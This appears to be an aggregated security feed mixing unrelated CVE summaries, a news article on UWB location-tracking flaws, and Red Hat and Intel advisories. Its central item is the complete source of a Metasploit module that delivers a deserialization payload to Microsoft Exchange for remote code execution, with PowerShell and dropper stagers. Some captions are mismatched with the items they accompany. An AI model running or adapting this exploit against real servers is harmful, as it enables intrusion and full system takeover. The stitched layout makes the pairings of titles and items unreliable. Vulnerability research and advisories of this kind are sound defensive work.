HTML injection combined with path traversal in the Email service in Gravitee API Management before 1.25.3 allows anonymous users to read arbitrary files via a /management/users/register request.

**Gravitee.io API Management**

**Overview**

Gravitee.io API Management is a flexible, lightweight and blazing-fast Open Source solution that helps your organization control who, when and how users access your APIs. Effortlessly manage the lifecycle of your APIs. Download API Management to document, discover and publish your APIs.

**Features**

*   Register your API : Create and register APIs in a matter of a few clicks to easily expose your secured APIs to internal and external consumers.
    
*   Configure policies using flows: Gravitee.io API Management provides over 50 pre-built policies to effectively shape traffic reaching the gateway according to your business requirements.
    
*   Developer portal: Build the portal that your developers want with a custom theme, full text search and API documentation.
    
*   Analytics dashboard: The out-of-the-box dashboards give you a 360-degree view of your API. You can also build your own dashboards from Gravitee.io or use all metrics with external tools like Grafana or Kibana.
    
*   Register applications: Users and administrators can register applications for consuming APIs with ease. Gravitee.io provides advanced dynamic client registration to effectively link API Management and Access Management.
    
*   Secured plan: Create contracts between your API consumers and APIs - building API products from your backend services.
    

**Documentation**

**Community**

Got questions, suggestions or feedback? Why not join us on the community forum.

CVE-2019-25075: GitHub - gravitee-io/gravitee-api-management: Gravitee.io - OpenSource API Management

Xpdf prior to version 4.04 contains an integer overflow in the JBIG2 decoder (JBIG2Stream::readSymbolDictSeg() in JBIG2Stream.cc). Processing a specially crafted PDF file or JBIG2 image could lead to a crash or the execution of arbitrary code. This is similar to the vulnerability described by CVE-2021-30860 (Apple CoreGraphics).

CVE-2022-38171: A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution

This Metasploit module exploits vulnerabilities within the ChainedSerializationBinder as used in Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and Exchange Server 2016 CU22 all prior to Mar22SU. Note that authentication is required to exploit these vulnerabilities.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'nokogiri'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::Powershell  include Msf::Exploit::Remote::HTTP::Exchange  include Msf::Exploit::Deprecated  moved_from 'exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce'  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Microsoft Exchange Server ChainedSerializationBinder RCE',        'Description' => %q{          This module exploits vulnerabilities within the ChainedSerializationBinder as used in          Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and          Exchange Server 2016 CU22 all prior to Mar22SU.          Note that authentication is required to exploit these vulnerabilities.        },        'Author' => [          'pwnforsp', # Original Bug Discovery          'zcgonvh', # Of 360 noah lab, Original Bug Discovery          'Microsoft Threat Intelligence Center', # Discovery of exploitation in the wild          'Microsoft Security Response Center', # Discovery of exploitation in the wild          'peterjson', # Writeup          'testanull', # PoC Exploit          'Grant Willcox', # Aka tekwizz123. That guy in the back who took the hard work of all the people above and wrote this module :D          'Spencer McIntyre', # CVE-2022-23277 support and DataSet gadget chains          'Markus Wulftange' # CVE-2022-23277 research        ],        'References' => [          # CVE-2021-42321 references          ['CVE', '2021-42321'],          ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321'],          ['URL', 'https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7'],          ['URL', 'https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169'],          ['URL', 'https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398'],          ['URL', 'https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852'],          # CVE-2022-23277 references          ['CVE', '2022-23277'],          ['URL', 'https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html'],          ['URL', 'https://testbnull.medium.com/note-nhanh-v%E1%BB%81-binaryformatter-binder-v%C3%A0-cve-2022-23277-6510d469604c']        ],        'DisclosureDate' => '2021-12-09',        'License' => MSF_LICENSE,        'Platform' => 'win',        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Privileged' => true,        'Targets' => [          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Type' => :win_cmd            }          ],          [            'Windows Dropper',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :win_dropper,              'DefaultOptions' => {                'CMDSTAGER::FLAVOR' => :psh_invokewebrequest              }            }          ],          [            'PowerShell Stager',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :psh_stager            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'HttpClientTimeout' => 5,          'WfsDelay' => 10        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS, # Can easily log using advice at https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169            CONFIG_CHANGES # Alters the user configuration on the Inbox folder to get the payload to trigger.          ]        }      )    )    register_options([      Opt::RPORT(443),      OptString.new('TARGETURI', [true, 'Base path', '/']),      OptString.new('HttpUsername', [true, 'The username to log into the Exchange server as']),      OptString.new('HttpPassword', [true, 'The password to use to authenticate to the Exchange server'])    ])  end  def post_auth?    true  end  def username    datastore['HttpUsername']  end  def password    datastore['HttpPassword']  end  def cve_2021_42321_vuln_builds    # https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019    [      '15.1.2308.8', '15.1.2308.14', '15.1.2308.15', # Exchange Server 2016 CU21      '15.1.2375.7', '15.1.2375.12', # Exchange Server 2016 CU22      '15.2.922.7', '15.2.922.13', '15.2.922.14', # Exchange Server 2019 CU10      '15.2.986.5', '15.2.986.9' # Exchange Server 2019 CU11    ]  end  def cve_2022_23277_vuln_builds    # https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019    [      '15.1.2308.20', # Exchange Server 2016 CU21 Nov21SU      '15.1.2308.21', # Exchange Server 2016 CU21 Jan22SU      '15.1.2375.17', # Exchange Server 2016 CU22 Nov21SU      '15.1.2375.18', # Exchange Server 2016 CU22 Jan22SU      '15.2.922.19', # Exchange Server 2019 CU10 Nov21SU      '15.2.922.20', # Exchange Server 2019 CU10 Jan22SU      '15.2.986.14', # Exchange Server 2019 CU11 Nov21SU      '15.2.986.15'  # Exchange Server 2019 CU11 Jan22SU    ]  end  def check    # Note we are only checking official releases here to reduce requests when checking versions with exchange_get_version    current_build_rex = exchange_get_version(exchange_builds: cve_2021_42321_vuln_builds + cve_2022_23277_vuln_builds)    if current_build_rex.nil?      return CheckCode::Unknown("Couldn't retrieve the target Exchange Server version!")    end    @exchange_build = current_build_rex.to_s    if cve_2021_42321_vuln_builds.include?(@exchange_build)      CheckCode::Appears("Exchange Server #{@exchange_build} is vulnerable to CVE-2021-42321")    elsif cve_2022_23277_vuln_builds.include?(@exchange_build)      CheckCode::Appears("Exchange Server #{@exchange_build} is vulnerable to CVE-2022-23277")    else      CheckCode::Safe("Exchange Server #{@exchange_build} does not appear to be a vulnerable version!")    end  end  def exploit    if @exchange_build.nil? # make sure the target build is known and if it's not (because the check was skipped), get it      @exchange_build = exchange_get_version(exchange_builds: cve_2021_42321_vuln_builds + cve_2022_23277_vuln_builds)&.to_s      if @exchange_build.nil?        fail_with(Failure::Unknown, 'Failed to identify the target Exchange Server build version.')      end    end    if cve_2021_42321_vuln_builds.include?(@exchange_build)      @gadget_chain = :ClaimsPrincipal    elsif cve_2022_23277_vuln_builds.include?(@exchange_build)      @gadget_chain = :DataSetTypeSpoof    else      fail_with(Failure::NotVulnerable, "Exchange Server #{@exchange_build} is not a vulnerable version!")    end    case target['Type']    when :win_cmd      execute_command(payload.encoded)    when :win_dropper      execute_cmdstager    when :psh_stager      execute_command(cmd_psh_payload(        payload.encoded,        payload.arch.first,        remove_comspec: true      ))    end  end  def execute_command(cmd, _opts = {})    # Get the user's inbox folder's ID and change key ID.    print_status("Getting the user's inbox folder's ID and ChangeKey ID...")    xml_getfolder_inbox = %(<?xml version="1.0" encoding="utf-8"?>    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">      <soap:Header>      <t:RequestServerVersion Version="Exchange2013" />      </soap:Header>      <soap:Body>      <m:GetFolder>        <m:FolderShape>        <t:BaseShape>AllProperties</t:BaseShape>        </m:FolderShape>        <m:FolderIds>        <t:DistinguishedFolderId Id="inbox" />        </m:FolderIds>      </m:GetFolder>      </soap:Body>    </soap:Envelope>)    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),        'data' => xml_getfolder_inbox,        'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.      }    )    fail_with(Failure::Unreachable, 'Connection failed') if res.nil?    unless res&.body      fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')    end    if res.code == 401      fail_with(Failure::NoAccess, "Server responded with 401 Unauthorized for user: #{datastore['DOMAIN']}\\#{username}")    end    xml_getfolder = res.get_xml_document    xml_getfolder.remove_namespaces!    xml_tag = xml_getfolder.xpath('//FolderId')    if xml_tag.empty?      print_error('Are you sure the current user has logged in previously to set up their mailbox? It seems they may have not had a mailbox set up yet!')      fail_with(Failure::UnexpectedReply, 'Response obtained but no FolderId element was found within it!')    end    unless xml_tag.attribute('Id') && xml_tag.attribute('ChangeKey')      fail_with(Failure::UnexpectedReply, 'Response obtained without expected Id and ChangeKey elements!')    end    change_key_val = xml_tag.attribute('ChangeKey').value    folder_id_val = xml_tag.attribute('Id').value    print_good("ChangeKey value for Inbox folder is #{change_key_val}")    print_good("ID value for Inbox folder is #{folder_id_val}")    # Delete the user configuration object that currently on the Inbox folder.    print_status('Deleting the user configuration object associated with Inbox folder...')    xml_delete_inbox_user_config = %(<?xml version="1.0" encoding="utf-8"?>    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">      <soap:Header>        <t:RequestServerVersion Version="Exchange2013" />      </soap:Header>      <soap:Body>        <m:DeleteUserConfiguration>          <m:UserConfigurationName Name="ExtensionMasterTable">            <t:FolderId Id="#{folder_id_val}" ChangeKey="#{change_key_val}" />          </m:UserConfigurationName>        </m:DeleteUserConfiguration>      </soap:Body>    </soap:Envelope>)    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),        'data' => xml_delete_inbox_user_config,        'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.      }    )    fail_with(Failure::Unreachable, 'Connection failed') if res.nil?    unless res&.body      fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')    end    if res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>}      print_good('Successfully deleted the user configuration object associated with the Inbox folder!')    else      print_warning('Was not able to successfully delete the existing user configuration on the Inbox folder!')      print_warning('Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!')    end    # Now to replace the deleted user configuration object with our own user configuration object.    print_status('Creating the malicious user configuration object on the Inbox folder!')    xml_malicious_user_config = %(<?xml version="1.0" encoding="utf-8"?>    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">      <soap:Header>        <t:RequestServerVersion Version="Exchange2013" />      </soap:Header>      <soap:Body>        <m:CreateUserConfiguration>          <m:UserConfiguration>            <t:UserConfigurationName Name="ExtensionMasterTable">              <t:FolderId Id="#{folder_id_val}" ChangeKey="#{change_key_val}" />            </t:UserConfigurationName>            <t:Dictionary>              <t:DictionaryEntry>                <t:DictionaryKey>                  <t:Type>String</t:Type>                  <t:Value>OrgChkTm</t:Value>                </t:DictionaryKey>                <t:DictionaryValue>                  <t:Type>Integer64</t:Type>                  <t:Value>#{rand(1000000000000000000..9111999999999999999)}</t:Value>                </t:DictionaryValue>              </t:DictionaryEntry>              <t:DictionaryEntry>                <t:DictionaryKey>                  <t:Type>String</t:Type>                  <t:Value>OrgDO</t:Value>                </t:DictionaryKey>                <t:DictionaryValue>                  <t:Type>Boolean</t:Type>                  <t:Value>false</t:Value>                </t:DictionaryValue>              </t:DictionaryEntry>            </t:Dictionary>            <t:BinaryData>#{Rex::Text.encode_base64(Msf::Util::DotNetDeserialization.generate(cmd, gadget_chain: @gadget_chain, formatter: :BinaryFormatter))}</t:BinaryData>          </m:UserConfiguration>        </m:CreateUserConfiguration>      </soap:Body>    </soap:Envelope>)    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),        'data' => xml_malicious_user_config,        'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.      }    )    fail_with(Failure::Unreachable, 'Connection failed') if res.nil?    unless res&.body      fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')    end    unless res.body =~ %r{<m:CreateUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:CreateUserConfigurationResponseMessage>}      fail_with(Failure::UnexpectedReply, 'Was not able to successfully create the malicious user configuration on the Inbox folder!')    end    print_good('Successfully created the malicious user configuration object and associated with the Inbox folder!')    # Deserialize our object. If all goes well, you should now have SYSTEM :)    print_status('Attempting to deserialize the user configuration object using a GetClientAccessToken request...')    xml_get_client_access_token = %(<?xml version="1.0" encoding="utf-8"?>    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">      <soap:Header>        <t:RequestServerVersion Version="Exchange2013" />      </soap:Header>      <soap:Body>        <m:GetClientAccessToken>          <m:TokenRequests>            <t:TokenRequest>              <t:Id>#{Rex::Text.rand_text_alphanumeric(4..50)}</t:Id>              <t:TokenType>CallerIdentity</t:TokenType>            </t:TokenRequest>          </m:TokenRequests>        </m:GetClientAccessToken>      </soap:Body>    </soap:Envelope>)    begin      send_request_cgi(        {          'method' => 'POST',          'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),          'data' => xml_get_client_access_token,          'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.        }      )    rescue Errno::ECONNRESET      # when using the DataSetTypeSpoof gadget, it's expected that this connection reset exception will be raised    end  endend

Microsoft Exchange Server ChainedSerializationBinder Remote Code Execution

Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in WebbaPlugins Webba Booking plugin <= 4.2.21 at WordPress.

CVE-2021-36847: Webba Booking: Appointment & Event Booking Calendar Plugin

Researchers have disclosed multiple vulnerabilities impacting Ultra-wideband (UWB) Real-time Locating Systems (RTLS), enabling threat actors to launch adversary-in-the-middle (AitM) attacks and tamper with location data.
"The zero-days found specifically pose a security risk for workers in industrial environments," cybersecurity firm Nozomi Networks disclosed in a technical write-up last week. "

Researchers have disclosed multiple vulnerabilities impacting Ultra-wideband (UWB) Real-time Locating Systems (RTLS), enabling threat actors to launch adversary-in-the-middle (AitM) attacks and tamper with location data.

"The zero-days found specifically pose a security risk for workers in industrial environments," cybersecurity firm Nozomi Networks disclosed in a technical write-up last week. "If a threat actor exploits these vulnerabilities, they have the ability to tamper with safety zones designated by RTLS to protect workers in hazardous areas."

RTLS is used to automatically identify and track the location of objects or people in real-time, usually within a confined indoor area. This is achieved by making use of tags that are attached to assets, which broadcast USB signals to fixed reference points called anchors that then determine their location.

But flaws identified in RTLS solutions – Sewio Indoor Tracking RTLS UWB Wi-Fi Kita and Avalue Renity Artemis Enterprise Kit – meant that they could be weaponized to intercept network packets exchanged between anchors and the central server and stage traffic manipulation attacks.

Put simply, the idea is to estimate the anchor coordinates and use it to manipulate the geofencing rules of the RTLS system, effectively tricking the software into granting access to restricted areas and even causing disruption to production environments.

"If an attacker is able to alter the position of a tag by modifying the positioning packet related to that tag, it may become possible to enter restricted zones or steal valuable items without the operators being able to detect that a malicious activity is ongoing."

Even worse, by altering the position of tags and placing them inside areas monitored by geofencing rules, an adversary can cause the stoppage of entire production lines by showing that a worker is nearby even when no one is actually around.

In an alternate scenario, the location data could be tampered to place a worker outside of a geofencing zone so that dangerous machinery would restart while a worker is in close proximity, posing severe safety risks.

But it's worth pointing out that doing so necessitates that an attacker either compromises a computer connected to that network, or surreptitiously adds a rogue device to gain unauthorized access to the network.

To remediate such attacks, it's recommended to enforce network segregation and add a traffic encryption layer on top of the existing communications to prevent AitM attacks.

"Weak security requirements in critical software can lead to safety issues that cannot be ignored," researchers Andrea Palanca, Luca Cremona, and Roya Gordon said. "Exploiting secondary communications in UWB RTLS can be challenging, but it is doable."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

RTLS Systems Found Vulnerable to MiTM Attacks and Location Tampering

Red Hat Security Advisory 2022-6051-01 - An update is now available for RHOL-5.5-RHEL-8. Issues addressed include denial of service, man-in-the-middle, and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Logging Subsystem 5.5.0 - Red Hat OpenShift security update  
Advisory ID:       RHSA-2022:6051-01  
Product:           RHOL  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6051  
Issue date:        2022-08-18  
CVE Names:         CVE-2021-38561 CVE-2022-0759 CVE-2022-1012  
                   CVE-2022-1292 CVE-2022-1586 CVE-2022-1785  
                   CVE-2022-1897 CVE-2022-1927 CVE-2022-2068  
                   CVE-2022-2097 CVE-2022-21698 CVE-2022-30631  
                   CVE-2022-32250  
====================================================================  
1. Summary:

An update is now available for RHOL-5.5-RHEL-8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Logging Subsystem 5.5.0 - Red Hat OpenShift

Security Fix(es):

* kubeclient: kubeconfig parsing error can lead to MITM attacks  
(CVE-2022-0759)

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

* golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
(CVE-2021-38561)

* prometheus/client_golang: Denial of service using  
InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter  
2058404 - CVE-2022-0759 kubeclient: kubeconfig parsing error can lead to MITM attacks  
2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

5. JIRA issues fixed (https://issues.jboss.org/):

LOG-1415 - Allow users to tune fluentd  
LOG-1539 - Events and CLO csv are not collected after running `oc adm must-gather --image=$downstream-clo-image `  
LOG-1713 - Reduce Permissions granted for prometheus-k8s service account  
LOG-2063 - Collector pods fail to start when a Vector only Cluster Logging instance is created.  
LOG-2134 - The infra logs are sent to app-xx indices  
LOG-2159 - Cluster Logging Pods in CrashLoopBackOff  
LOG-2165 - [Vector] Default log level debug makes it hard to find useful error/failure messages.  
LOG-2167 - [Vector] Collector pods fails to start with configuration error when using Kafka SASL over SSL  
LOG-2169 - [Vector] Logs not being sent to Kafka with SASL plaintext.  
LOG-2172 - [vector]The openshift-apiserver and ovn audit logs can not  be collected.  
LOG-2242 - Log file metric exporter is still following /var/log/containers files.  
LOG-2243 - grafana-dashboard-cluster-logging should be deleted once clusterlogging/instance was removed  
LOG-2264 - Logging link should contain an icon  
LOG-2274 - [Logging 5.5] EO doesn't recreate secrets kibana and kibana-proxy after removing them.  
LOG-2276 - Fluent config format is hard to read via configmap  
LOG-2290 - ClusterLogging Instance status in not getting updated in UI  
LOG-2291 - [release-5.5] Events listing out of order in Kibana 6.8.1  
LOG-2294 - [Vector] Vector internal metrics are not exposed via HTTPS due to which OpenShift Monitoring Prometheus service cannot scrape the metrics endpoint.  
LOG-2300 - [Logging 5.5]ES pods can't be ready after removing secret/signing-elasticsearch  
LOG-2303 - [Logging 5.5] Elasticsearch cluster upgrade stuck  
LOG-2308 - configmap grafana-dashboard-elasticsearch is being created and deleted continously  
LOG-2333 - Journal logs not reaching Elasticsearch output  
LOG-2337 - [Vector] Missing @ prefix from the timestamp field in log record.  
LOG-2342 - [Logging 5.5] Kibana pod can't connect to ES cluster after removing secret/signing-elasticsearch: "x509: certificate signed by unknown authority"  
LOG-2384 - Provide a method to get authenticated from GCP  
LOG-2411 - [Vector] Audit logs forwarding not working.  
LOG-2412 - CLO's loki output url is parsed wrongly  
LOG-2413 - PriorityClass cluster-logging is deleted if provide an invalid log type  
LOG-2418 - EO supported time units don't match the units specified in CRDs.  
LOG-2439 - Telemetry: the managedStatus&healthStatus&version values are wrong  
LOG-2440 - [loki-operator] Live tail of logs does not work on OpenShift  
LOG-2444 - The write index is removed when `the size of the index` > `diskThresholdPercent% * total size`.  
LOG-2460 - [Vector] Collector pods fail to start on a FIPS enabled cluster.  
LOG-2461 - [Vector] Vector auth config not generated when user provided bearer token is used in a secret for connecting to LokiStack.  
LOG-2463 - Elasticsearch operator repeatedly prints error message when checking indices  
LOG-2474 - EO shouldn't grant cluster-wide permission to system:serviceaccount:openshift-monitoring:prometheus-k8s when ES cluster is deployed. [openshift-logging 5.5]  
LOG-2522 - CLO supported time units don't match the units specified in CRDs.  
LOG-2525 - The container's logs are not sent to separate index if the annotation is added after the pod is ready.  
LOG-2546 - TLS handshake error on loki-gateway for FIPS cluster  
LOG-2549 - [Vector] [master] Journald logs not sent to the Log store when using Vector as collector.  
LOG-2554 - [Vector] [master] Fallback index is not used when structuredTypeKey is missing from JSON log data  
LOG-2588 - FluentdQueueLengthIncreasing rule failing to be evaluated.  
LOG-2596 - [vector]the condition in [transforms.route_container_logs] is inaccurate  
LOG-2599 - Supported values for level field don't match documentation  
LOG-2605 - $labels.instance is empty in the message when firing FluentdNodeDown alert  
LOG-2609 - fluentd and vector are unable to ship logs to elasticsearch when cluster-wide proxy is in effect  
LOG-2619 - containers violate PodSecurity -- Log Exporation  
LOG-2627 - containers violate PodSecurity -- Loki  
LOG-2649 - Level Critical should match the beginning of the line as the other levels  
LOG-2656 - Logging uses deprecated v1beta1 apis  
LOG-2664 - Deprecated Feature logs causing too much noise  
LOG-2665 - [Logging 5.5] Sometimes collector fails to push logs to Elasticsearch cluster  
LOG-2693 - Integration with Jaeger fails for ServiceMonitor  
LOG-2700 - [Vector] vector container can't start due to "unknown field `pod_annotation_fields`" .  
LOG-2703 - Collector DaemonSet is not removed when CLF is deleted for fluentd/vector only CL instance  
LOG-2725 - Upgrade logging-eventrouter Golang  version and tags  
LOG-2731 - CLO keeps reporting `Reconcile ServiceMonitor retry error` and `Reconcile Service retry error` after creating clusterlogging.  
LOG-2732 - Prometheus Operator pod throws 'skipping servicemonitor' error on Jaeger integration  
LOG-2742 - unrecognized outputs when use the sts role secret  
LOG-2746 - CloudWatch forwarding rejecting large log events, fills tmpfs  
LOG-2749 - OpenShift Logging Dashboard for Elastic Shards shows "active_primary" instead of "active" shards.  
LOG-2753 - Update Grafana configuration for LokiStack integration on grafana/loki repo  
LOG-2763 - [Vector]{Master} Vector's healthcheck fails when forwarding logs to Lokistack.  
LOG-2764 - ElasticSearch operator does not respect referencePolicy when selecting oauth-proxy image  
LOG-2765 - ingester pod can not be started in IPv6 cluster  
LOG-2766 - [vector] failed to parse cluster url: invalid authority IPv6 http-proxy  
LOG-2772 - arn validation failed when role_arn=arn:aws-us-gov:xxx  
LOG-2773 - No cluster-logging-operator-metrics  service in logging 5.5  
LOG-2778 - [Vector] [OCP 4.11] SA token not added to Vector config when connecting to LokiStack instance without CLF creds secret required by LokiStack.  
LOG-2784 - Japanese log messages are garbled at Kibana  
LOG-2793 - [Vector] OVN audit logs are missing the level field.  
LOG-2864 - [vector] Can not sent logs to default when loki is the default output in CLF  
LOG-2867 - [fluentd] All logs are sent to application tenant when loki is used as default logstore in CLF.  
LOG-2873 - [Vector] Cannot configure CPU/Memory requests/limits when using Vector as collector.  
LOG-2875 - Seeing a black rectangle box on the graph in Logs view  
LOG-2876 - The link to the 'Container details' page on the 'Logs' screen throws error  
LOG-2877 - When there is no query entered, seeing error message on the Logs view  
LOG-2882 - RefreshIntervalDropdown and TimeRangeDropdown always set back to its original values when switching between pages in 'Logs' screen

6. References:

https://access.redhat.com/security/cve/CVE-2021-38561  
https://access.redhat.com/security/cve/CVE-2022-0759  
https://access.redhat.com/security/cve/CVE-2022-1012  
https://access.redhat.com/security/cve/CVE-2022-1292  
https://access.redhat.com/security/cve/CVE-2022-1586  
https://access.redhat.com/security/cve/CVE-2022-1785  
https://access.redhat.com/security/cve/CVE-2022-1897  
https://access.redhat.com/security/cve/CVE-2022-1927  
https://access.redhat.com/security/cve/CVE-2022-2068  
https://access.redhat.com/security/cve/CVE-2022-2097  
https://access.redhat.com/security/cve/CVE-2022-21698  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/cve/CVE-2022-32250  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYv5/w9zjgjWX9erEAQhRBBAAiZe24VtCQruCG/MvGEOowBvHf/YNANlR  
N6WAw2VezEfvFkG7z599MWZVWz2jnZO6cn9i+CoNDanAmItPJ8ljK4sitrP2ywrG  
OKwqIa4DPrywFFTSMxemB604ewE0cvXifuqG5bQDn+GvndiV/u/XaVTYZseY1P5X  
8ZIJ20cxROOE9pg0/3eya27edZxDrgWx6BtzSEZw47ReV3Dogqy+KzRCAAoN+pE5  
g2t/E0u0Ypmjil9Ttsop/ejUg/iz8UTGtua4m1nzhZrsoE84p5xIgvCEkYlh3OrD  
tfawpj1r9Avcjk4zbZkAe/enSQZQv0iWD792SoP7/ddX5tIu05ArvPWj/NvN/rI4  
dFzMe2UmezuS2EQpzaWOug2xSQUbR1hI+Y4cy0YOHuwzeaMeoHSbNYTJmOxKR0v1  
44a9oSBku+Xfk8nUNqS+9oq0z3DlAWt2BjbfrJCbSjZQdOUOIGM95L3ClrXY9LYF  
PT5v+h2W4myonj6HVhkv+Wy7aRbYQ7Qhk/3AaN7Dz5soBSNK4exvOzWXGuf/BdSf  
XFef6O87ipZveHQYmTfH+t8aJV1plEVTrm8pyz2EfzCv1Fnhjn0rvbGZAFBlvqW+  
vhxoj505RQBBhcno16V1zczdd8KsiqY7aZniTuh2DQAVvNhqsHgn8rvQ7HJlExun  
eIFVKOxx310=ynB/  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6051-01

Unsafe Parsing of a PNG tRNS chunk in FastStone Image Viewer through 7.5 results in a stack buffer overflow.

CVE-2022-36947: FastStone Image Viewer - Powerful and Intuitive Photo Viewer, Editor and Batch Converter

Insufficiently protected credentials for Intel(R) AMT and Intel(R) Standard Manageability may allow a privileged user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® AMT and Intel® Standard Manageability Advisory**

Intel ID:

INTEL-SA-00709

Advisory Category:

Firmware

Impact of vulnerability:

Escalation of Privilege, Information Disclosure

Severity rating:

HIGH

Original release:

08/09/2022

Last revised:

08/09/2022

**Summary: **

Potential security vulnerabilities in the Intel® Active Management Technology (AMT) and Intel® Standard Manageability may allow escalation of privilege or information disclosure. Intel is releasing prescriptive guidance to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2022-30601

Description: Insufficiently protected credentials for Intel(R) AMT and Intel(R) Standard Manageability may allow an unauthenticated user to potentially enable information disclosure and escalation of privilege via network access.
